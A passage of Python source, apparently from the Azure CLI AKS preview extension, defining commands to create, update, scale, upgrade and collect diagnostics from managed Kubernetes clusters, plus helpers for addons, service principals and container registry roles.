resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
disable_disk_driver=None,
disable_file_driver=None,
disable_snapshot_controller=None,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
cluster_snapshot_id=None,
enable_oidc_issuer=False,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
enable_apiserver_vnet_integration=False,
apiserver_subnet_id=None,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
disable_workload_identity=None,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
enable_disk_driver=None,
disable_disk_driver=None,
enable_file_driver=None,
disable_file_driver=None,
enable_snapshot_controller=None,
disable_snapshot_controller=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False,
http_proxy_config=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
enable_apiserver_vnet_integration=False,
apiserver_subnet_id=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace(
"# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace(
"# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(
curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There is more than one node pool in the cluster. '
'Please specify a nodepool name or use the az aks nodepool command to scale a node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provides convenience for customers on the client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. The node-image-only upgrade operation '
'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
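# Each recognized addon name is mapped to a ManagedClusterAddonProfile and removed
# from the list; anything still left at the end is reported as unrecognized.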
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={
CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
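# Resolve the service principal/secret pair used by the cluster: when --service-principal is
# omitted, try to reuse the values cached in aksServicePrincipal.json; otherwise validate that
# --client-secret was supplied. A new service principal is created only when nothing can be loaded.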
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this subscription?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
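# Validate the autoscaler-related arguments (min-count <= node-count <= max-count) and, when
# --enable-cluster-autoscaler is set, copy them onto the agent pool profile.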
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler is set')
if int(min_count) > int(max_count):
raise CLIError(
'The value of min-count must be less than or equal to the value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count must be within the range defined by min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count can only be used together with --enable-cluster-autoscaler; please specify the flag')
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
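# Locate the target ACR either by full resource ID or by name across all resource groups, then
# delegate to _ensure_aks_acr_role_assignment to grant (or remove) the 'acrpull' role.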
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
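# Create the 'acrpull' role assignment for the given client ID on the registry scope, or delete
# it when detach=True.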
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
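# Create a new agent pool on an existing managed cluster. Values omitted on the command line may
# be filled in from a node pool snapshot (--snapshot-id) before the AgentPool model is built and
# sent via begin_create_or_update.
# Illustrative usage: az aks nodepool add -g <rg> --cluster-name <cluster> -n <nodepool> --node-count 3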
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
